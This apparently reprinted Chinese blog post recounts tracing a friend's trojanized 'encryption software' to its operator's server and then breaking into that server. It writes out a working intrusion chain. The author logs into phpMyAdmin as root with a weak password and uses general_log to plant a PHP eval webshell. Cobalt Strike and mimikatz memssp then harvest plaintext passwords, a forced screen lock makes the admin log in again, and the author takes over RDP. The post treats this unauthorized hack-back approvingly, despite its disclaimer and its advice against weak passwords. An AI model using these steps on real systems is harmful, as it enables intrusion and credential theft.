前段时间一个朋友说直接QQ老是发一些莫名其妙的东西。求助于我。当时我觉得应该是他QQ被盗了。可是没有被异地登陆的情况。一直排查QQ的安全问题。电脑都重启了。一直没用。让我感到有点意外。我在想问题出现在哪。毫无头绪。让他试了很多办法都没有用。觉得远程给他解决,当给他远程的时候发现他电脑上居然把安全软件关了。这个时候我感觉可能被人当肉鸡了。就问他有没有下载什么软件,
这个时候他说之前买过加密软件,这个报毒是很正常的。然后就发给我了。
加密软件报毒一般来说是很正常。当我下载下来的时候。
哎,这是啥。一把抓住真凶了。本来以为这个事就完了。
但是看到这东西不研究一下怎么行呢!
直接丢到微步分析看看能不能挖出什么重要的信息,软件的持久化跟读取系统信息这类的高危操作行为,确定远控无疑了。
再看看跟软件交互的ip或者URL做为入手点,果不其然在大量的URL链接中发现了一条开着http协议的ip地址。
访问一看居然是首页。那这个IP看到是服务器IP了
既然来了web的服务,直接上dirmap的目录探测试试看。
直接复制路径访问,习惯性的一波弱口令root/root给进去了…….像这类的软件作者安全意识很低几乎没有,因为没有人去抓包去分析流量很难发现背后所交互的ip,果然又是一套phpStudy搭建起来的web服务。
因为已经拿到了phpmyadmin的数据库且还是root权限的,可利用数据库的日志导出功能导出一句话php。
先手动开启日志。
set globalgeneral_log=’on’
show variables like “general_log%”
检测一下
set global general_log_file =”C:phpStudyPHPTutorialWWWinfo.php”
设置日志文件输出的路径,结合PHPinfo文件得到网站的绝对路径,直接输出到web路径下。
select ‘<?php eval($_POST[‘tools’]);?>’
一句话到日志文件里面
连上菜刀
到这里就已经拿到了webshell,但shell 的权限还太过于小我们的目标是拿下对方的系统权限,这里我用cs上线方便后续的操作,cs生成上线程序“splww64.exe”,利用菜刀的虚拟终端管理运行我们的程序。
权限到手后接下来就是激动人心的读取密码了,当然我们已经有了Administrator的权限可以自己添加个新用户,但这样会引起管理员的注意,这里我们用cs自带的mimikatz来抓取用户的登陆密码,但很遗憾的是对方服务器是Windows Server 2012 R2版本的,Windows Server 2012 R2已经修复了以前从内存获取密码的漏洞,并且IPC$的远程认证方式也改变了,导致没办法进行hash注入,因为默认不存储LM hash ,也只能抓取NTLM hash ,基本上也是很难破解成功的。
还是太年轻啊。Mimikatz –内存中的SSP,当用户再次通过系统进行身份验证时,将在System32中创建一个日志文件,其中将包含纯文本用户密码,此操作不需要重启目标机子,只需要锁屏对方再登陆时即可记录下明文密码,需另传mimikatz.exe程序到目标机子,然后在cs终端执行
C:/mimikazt.exe privilege::debug misc::memssp exit
当看到Injected =)的时候,表明已经注入成功。
接下来就是使对方的屏幕锁屏,终端键入rundll32.exe user32.dll,LockWorkStation
等一段时间再用
查看用户登陆情况
net user Administrator
在管理员再次输入密码登录时,明文密码会记录在C:WindowsSystem32mimilsa.log文件,在查看目标机子产生的log文件时间刚好对应得上,下载到本地打开。
目标机子的明文密码已经取到手了,接下来上nmap全端口扫描出RDP远程登陆端口,执行
nmap -p 1-65355 10x.xx.xx.xx
可看到目标机子的端口是默认的3389端口。
登陆发现目前已有两千多用户了…..啊呸两千多肉鸡。
剩下的还是警察叔叔出场了。
对此我们也不难看出一条root或者说口令导致后面那么多控制权限。当然这个是罪有应得。但是想想我们正常的应用还是有很多这种疏忽。大家应当排查自己所多外开放的服务。关闭或者修改本身的端口。一定不要使用弱口令 一定一定不要使用弱口令。
在此技术交流与分享切勿用于非法勾当。莫伸手伸手必被抓!
来源:戴丶小莫
声明:本站部分文章及图片转载于互联网,内容版权归原作者所有,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!